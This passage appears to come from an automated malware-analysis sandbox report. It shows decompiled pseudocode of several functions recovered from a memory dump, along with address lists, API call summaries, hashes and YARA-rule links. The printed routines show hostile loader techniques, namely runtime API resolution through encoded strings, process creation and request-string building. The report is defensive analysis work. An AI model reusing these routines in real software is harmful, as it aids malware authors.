					StrTrimA(_t148, 0x497c2ac);
					_push(_t148);
					_t94 = E049738CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x497d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04971922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E049747D5();
						L22:
						HeapFree( *0x497d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E0497365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E04973273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04974AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04978FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04974AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                          0x04976109
                                                                                                                          0x04976109
                                                                                                                          0x04976109
                                                                                                                          0x04976112
                                                                                                                          0x0497611b
                                                                                                                          0x0497611d
                                                                                                                          0x0497611d
                                                                                                                          0x0497612a
                                                                                                                          0x04976135
                                                                                                                          0x04976138
                                                                                                                          0x0497613d
                                                                                                                          0x04976146
                                                                                                                          0x04976149
                                                                                                                          0x0497614e
                                                                                                                          0x04976151
                                                                                                                          0x04976156
                                                                                                                          0x04976159
                                                                                                                          0x04976165
                                                                                                                          0x04976172
                                                                                                                          0x04976174
                                                                                                                          0x0497617a
                                                                                                                          0x0497617f
                                                                                                                          0x0497618a
                                                                                                                          0x0497618c
                                                                                                                          0x0497618f
                                                                                                                          0x04976191
                                                                                                                          0x04976196
                                                                                                                          0x0497619c
                                                                                                                          0x049761a1
                                                                                                                          0x049761a4
                                                                                                                          0x049761a9
                                                                                                                          0x049761b6
                                                                                                                          0x049761b8
                                                                                                                          0x049761be
                                                                                                                          0x049761c8
                                                                                                                          0x049761c8
                                                                                                                          0x049761ca
                                                                                                                          0x049761cf
                                                                                                                          0x049761d4
                                                                                                                          0x049761d7
                                                                                                                          0x049761dc
                                                                                                                          0x049761e9
                                                                                                                          0x049761eb
                                                                                                                          0x049761f9
                                                                                                                          0x049761f9
                                                                                                                          0x049761fb
                                                                                                                          0x04976209
                                                                                                                          0x0497620e
                                                                                                                          0x04976210
                                                                                                                          0x04976215
                                                                                                                          0x049763d6
                                                                                                                          0x049763e0
                                                                                                                          0x049763e9
                                                                                                                          0x0497621b
                                                                                                                          0x04976227
                                                                                                                          0x0497622d
                                                                                                                          0x04976232
                                                                                                                          0x049763ca
                                                                                                                          0x049763d4
                                                                                                                          0x00000000
                                                                                                                          0x049763d4
                                                                                                                          0x0497623e
                                                                                                                          0x04976243
                                                                                                                          0x0497624c
                                                                                                                          0x0497625d
                                                                                                                          0x04976261
                                                                                                                          0x0497626a
                                                                                                                          0x04976270
                                                                                                                          0x0497627f
                                                                                                                          0x04976286
                                                                                                                          0x0497628f
                                                                                                                          0x04976295
                                                                                                                          0x049763be
                                                                                                                          0x049763c8
                                                                                                                          0x00000000
                                                                                                                          0x049763c8
                                                                                                                          0x049762a1
                                                                                                                          0x049762a7
                                                                                                                          0x049762a8
                                                                                                                          0x049762ad
                                                                                                                          0x049762b2
                                                                                                                          0x049763b4
                                                                                                                          0x049763bc
                                                                                                                          0x00000000
                                                                                                                          0x049763bc
                                                                                                                          0x049762bb
                                                                                                                          0x049762c2
                                                                                                                          0x049762ca
                                                                                                                          0x049762cf
                                                                                                                          0x049762d8
                                                                                                                          0x049762e3
                                                                                                                          0x049762e8
                                                                                                                          0x049762ed
                                                                                                                          0x049763ec
                                                                                                                          0x049763a0
                                                                                                                          0x049763a0
                                                                                                                          0x049763a5
                                                                                                                          0x049763b0
                                                                                                                          0x049763b2
                                                                                                                          0x00000000
                                                                                                                          0x049763b2
                                                                                                                          0x049762f7
                                                                                                                          0x049762fc
                                                                                                                          0x04976301
                                                                                                                          0x04976306
                                                                                                                          0x04976316
                                                                                                                          0x04976319
                                                                                                                          0x0497631f
                                                                                                                          0x04976325
                                                                                                                          0x0497632b
                                                                                                                          0x0497632e
                                                                                                                          0x04976334
                                                                                                                          0x04976337
                                                                                                                          0x0497633c
                                                                                                                          0x04976340
                                                                                                                          0x04976340
                                                                                                                          0x0497634c
                                                                                                                          0x04976358
                                                                                                                          0x0497635c
                                                                                                                          0x0497635e
                                                                                                                          0x04976363
                                                                                                                          0x04976365
                                                                                                                          0x0497636a
                                                                                                                          0x0497636f
                                                                                                                          0x0497637c
                                                                                                                          0x04976384
                                                                                                                          0x04976387
                                                                                                                          0x04976387
                                                                                                                          0x04976363
                                                                                                                          0x00000000
                                                                                                                          0x0497634e
                                                                                                                          0x04976352
                                                                                                                          0x04976389
                                                                                                                          0x0497638c
                                                                                                                          0x04976395
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04976395
                                                                                                                          0x04976354
                                                                                                                          0x00000000
                                                                                                                          0x04976354
                                                                                                                          0x0497634c

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 0497611D
                                                                                                                          • wsprintfA.USER32 ref: 0497616D
                                                                                                                          • wsprintfA.USER32 ref: 0497618A
                                                                                                                          • wsprintfA.USER32 ref: 049761B6
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049761C8
                                                                                                                          • wsprintfA.USER32 ref: 049761E9
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049761F9
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04976227
                                                                                                                          • GetTickCount.KERNEL32 ref: 04976238
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 0497624C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 0497626A
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 04971974: strcpy.NTDLL ref: 049719BE
                                                                                                                            • Part of subcall function 04971974: lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04971974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,0497C2AC,?,06FF95B0), ref: 049762A1
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049738CA: lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                            • Part of subcall function 049738CA: lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 049762C2
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 049762CA
                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 049762D8
                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 049762DE
                                                                                                                            • Part of subcall function 04971922: lstrlen.KERNEL32(?,00000000,06FF9B38,00000000,049774FF,06FF9D16,?,?,?,?,?,69B25F44,00000005,0497D00C), ref: 04971929
                                                                                                                            • Part of subcall function 04971922: mbstowcs.NTDLL ref: 04971952
                                                                                                                            • Part of subcall function 04971922: memset.NTDLL ref: 04971964
                                                                                                                          • wcstombs.NTDLL ref: 0497636F
                                                                                                                            • Part of subcall function 04973273: SysAllocString.OLEAUT32(?), ref: 049732AE
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 049763B0
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049763BC
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,06FF95B0), ref: 049763C8
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049763D4
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 049763E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748877296-0
                                                                                                                          • Opcode ID: abf8024adcc16afe1a537e492875d9360d8c8bdcd99a9a26fb5430952201a44a
                                                                                                                          • Instruction ID: cc3562c39279af9dcf111f0889f6b366fef0874d5a3c29b62af84497a4a227c2
                                                                                                                          • Opcode Fuzzy Hash: abf8024adcc16afe1a537e492875d9360d8c8bdcd99a9a26fb5430952201a44a
                                                                                                                          • Instruction Fuzzy Hash: 9E912571904208EFEB119FA4DC88AAE7FB9FF49364B144175E904A7250D739ED12DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04975F64, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E04975F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x497d37c; // 0x6ff9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04973A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x497c1ac;
				}
				_t46 = E049751DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E049775F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x497d2e0; // 0x267a5a8
						_t16 = _t75 + 0x497eb10; // 0x530025
						 *0x497d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04973A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x497c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E049775F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04974AAB(_v20);
						} else {
							_t66 =  *0x497d2e0; // 0x267a5a8
							_t31 = _t66 + 0x497ec30; // 0x73006d
							 *0x497d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04974AAB(_v12);
				}
				return _v24;
			}




























                                                                                                                          0x04975f6c
                                                                                                                          0x04975f72
                                                                                                                          0x04975f79
                                                                                                                          0x04975f7f
                                                                                                                          0x04975f83
                                                                                                                          0x04975f87
                                                                                                                          0x04975f8a
                                                                                                                          0x04975f8f
                                                                                                                          0x04975f94
                                                                                                                          0x04975f96
                                                                                                                          0x04975f96
                                                                                                                          0x04975f9f
                                                                                                                          0x04975fa4
                                                                                                                          0x04975fa9
                                                                                                                          0x04975faf
                                                                                                                          0x04975fb9
                                                                                                                          0x04975fc2
                                                                                                                          0x04975fc9
                                                                                                                          0x04975fe2
                                                                                                                          0x04975fe7
                                                                                                                          0x04975fec
                                                                                                                          0x04975ff5
                                                                                                                          0x04975ffe
                                                                                                                          0x0497600f
                                                                                                                          0x04976018
                                                                                                                          0x0497601c
                                                                                                                          0x04976020
                                                                                                                          0x04976025
                                                                                                                          0x0497602a
                                                                                                                          0x0497602c
                                                                                                                          0x0497602c
                                                                                                                          0x04976036
                                                                                                                          0x0497603f
                                                                                                                          0x04976046
                                                                                                                          0x0497605e
                                                                                                                          0x04976062
                                                                                                                          0x0497609f
                                                                                                                          0x04976064
                                                                                                                          0x04976067
                                                                                                                          0x0497606f
                                                                                                                          0x04976080
                                                                                                                          0x0497608c
                                                                                                                          0x04976094
                                                                                                                          0x04976098
                                                                                                                          0x04976098
                                                                                                                          0x04976062
                                                                                                                          0x049760a7
                                                                                                                          0x049760ac
                                                                                                                          0x049760b3

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04975F79
                                                                                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04975FB9
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04975FC2
                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 04975FC9
                                                                                                                          • lstrlenW.KERNEL32(80000002), ref: 04975FD6
                                                                                                                          • lstrlen.KERNEL32(?,00000004), ref: 04976036
                                                                                                                          • lstrlen.KERNEL32(?), ref: 0497603F
                                                                                                                          • lstrlen.KERNEL32(?), ref: 04976046
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0497604D
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CountFreeHeapTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2535036572-0
                                                                                                                          • Opcode ID: 14dd7552d1e2f29f1b67b0fb786b9941ddcecb2bcc6e6a9ca3909202bee6ae01
                                                                                                                          • Instruction ID: e0f4cd373915de04d505b09ff97a0eba69ef2a7954250ef206385096789ccc98
                                                                                                                          • Opcode Fuzzy Hash: 14dd7552d1e2f29f1b67b0fb786b9941ddcecb2bcc6e6a9ca3909202bee6ae01
                                                                                                                          • Instruction Fuzzy Hash: 9D414772900209FBDF12AFA5CC09D9E7FB5EF84358F0540A5EA04A7211D736EE11EB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04971000, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E04971000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04974837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0497A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x497d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x497d2e0; // 0x267a5a8
					_t18 = _t47 + 0x497e3b3; // 0x73797325
					_t68 = E04972291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x497d2e0; // 0x267a5a8
						_t19 = _t50 + 0x497e760; // 0x6ff8d08
						_t20 = _t50 + 0x497e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E049734C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E049734C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x497d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04974AAB(_t70);
				goto L12;
			}


















                                                                                                                          0x04971008
                                                                                                                          0x04971008
                                                                                                                          0x04971017
                                                                                                                          0x0497101e
                                                                                                                          0x04971023
                                                                                                                          0x04971130
                                                                                                                          0x04971137
                                                                                                                          0x04971137
                                                                                                                          0x04971032
                                                                                                                          0x0497103a
                                                                                                                          0x0497103d
                                                                                                                          0x04971042
                                                                                                                          0x04971057
                                                                                                                          0x0497105d
                                                                                                                          0x0497105e
                                                                                                                          0x04971061
                                                                                                                          0x04971067
                                                                                                                          0x0497106a
                                                                                                                          0x0497106f
                                                                                                                          0x04971077
                                                                                                                          0x04971083
                                                                                                                          0x04971087
                                                                                                                          0x04971117
                                                                                                                          0x0497108d
                                                                                                                          0x0497108d
                                                                                                                          0x04971092
                                                                                                                          0x04971099
                                                                                                                          0x049710ad
                                                                                                                          0x049710b1
                                                                                                                          0x04971100
                                                                                                                          0x049710b3
                                                                                                                          0x049710b4
                                                                                                                          0x049710bb
                                                                                                                          0x049710d4
                                                                                                                          0x049710d6
                                                                                                                          0x049710da
                                                                                                                          0x049710e1
                                                                                                                          0x049710fb
                                                                                                                          0x049710e3
                                                                                                                          0x049710ec
                                                                                                                          0x049710f1
                                                                                                                          0x049710f1
                                                                                                                          0x049710e1
                                                                                                                          0x0497110f
                                                                                                                          0x0497110f
                                                                                                                          0x04971087
                                                                                                                          0x0497111e
                                                                                                                          0x04971127
                                                                                                                          0x0497112b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04974837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0497101C,?,00000001,?,?,00000000,00000000), ref: 0497485C
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0497487E
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04974894
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049748AA
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049748C0
                                                                                                                            • Part of subcall function 04974837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049748D6
                                                                                                                          • memset.NTDLL ref: 0497106A
                                                                                                                            • Part of subcall function 04972291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04971083,73797325), ref: 049722A2
                                                                                                                            • Part of subcall function 04972291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049722BC
                                                                                                                          • GetModuleHandleA.KERNEL32(4E52454B,06FF8D08,73797325), ref: 049710A0
                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 049710A7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0497110F
                                                                                                                            • Part of subcall function 049734C7: GetProcAddress.KERNEL32(36776F57,04975B13), ref: 049734E2
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 049710EC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 049710F1
                                                                                                                          • GetLastError.KERNEL32(00000001), ref: 049710F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3075724336-0
                                                                                                                          • Opcode ID: 460010af350e0433258078f889a964e0746ba4ebf1aa55ede2d3c92b02efbd23
                                                                                                                          • Instruction ID: ffd2d35811c203252d7b7a12e0b670eafff411463d5007ccc656535f7dd199cf
                                                                                                                          • Opcode Fuzzy Hash: 460010af350e0433258078f889a964e0746ba4ebf1aa55ede2d3c92b02efbd23
                                                                                                                          • Instruction Fuzzy Hash: 3E314FB6904208BFDB11AFE4DC89DAEBFBCEF44344F104475E605A7211D634AD45DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04971974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 63%
                                                                                                                          			E04971974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x497d2e0; // 0x267a5a8
				_t1 = _t9 + 0x497e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E049743A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E049775F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04975601(_t34, _t41, _a8);
						E04974AAB(_t41);
						_t42 = E0497756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04974AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E049726DD(_t36, _t33);
						if(_t43 != 0) {
							E04974AAB(_t36);
							_t36 = _t43;
						}
					}
					E04974AAB(_t28);
				}
				return _t36;
			}














                                                                                                                          0x04971974
                                                                                                                          0x04971977
                                                                                                                          0x04971978
                                                                                                                          0x04971980
                                                                                                                          0x04971987
                                                                                                                          0x0497198e
                                                                                                                          0x04971992
                                                                                                                          0x04971998
                                                                                                                          0x0497199f
                                                                                                                          0x049719a4
                                                                                                                          0x049719b6
                                                                                                                          0x049719ba
                                                                                                                          0x049719be
                                                                                                                          0x049719c4
                                                                                                                          0x049719c9
                                                                                                                          0x049719d9
                                                                                                                          0x049719db
                                                                                                                          0x049719f2
                                                                                                                          0x049719f6
                                                                                                                          0x049719f9
                                                                                                                          0x049719fe
                                                                                                                          0x049719fe
                                                                                                                          0x04971a07
                                                                                                                          0x04971a0b
                                                                                                                          0x04971a0e
                                                                                                                          0x04971a13
                                                                                                                          0x04971a13
                                                                                                                          0x04971a0b
                                                                                                                          0x04971a16
                                                                                                                          0x04971a16
                                                                                                                          0x04971a21

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 049743A8: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,0497198E,253D7325,00000000,00000000,745EC740,?,?,04974653,?), ref: 0497440F
                                                                                                                            • Part of subcall function 049743A8: sprintf.NTDLL ref: 04974430
                                                                                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                          • lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • strcpy.NTDLL ref: 049719BE
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04975601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,049719D8,00000000,?,?,?,04974653,?,06FF95B0), ref: 04975618
                                                                                                                            • Part of subcall function 04974AAB: HeapFree.KERNEL32(00000000,00000000,04975012,00000000,?,?,00000000), ref: 04974AB7
                                                                                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                            • Part of subcall function 0497756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049719F2,00000000,?,?,04974653,?,06FF95B0), ref: 04977578
                                                                                                                            • Part of subcall function 0497756E: _snprintf.NTDLL ref: 049775D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                          • String ID: =
                                                                                                                          • API String ID: 2864389247-1428090586
                                                                                                                          • Opcode ID: 597a986f5c575f2d15974d84780edbb15198a08e6bb3dc06d8252dd406fdfbdd
                                                                                                                          • Instruction ID: 297b0382c30d9c09d63ff6222a5785509a90651b25b1f5eb61b575d8a5ffcf50
                                                                                                                          • Opcode Fuzzy Hash: 597a986f5c575f2d15974d84780edbb15198a08e6bb3dc06d8252dd406fdfbdd
                                                                                                                          • Instruction Fuzzy Hash: 8611A033601624679A16BBA88C85C6E3BBD9FC56A83054135FA05AB201DE38FD0297A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04971A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04971AF6
                                                                                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04971B0A
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 04971B1C
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B84
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B93
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04971B9E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
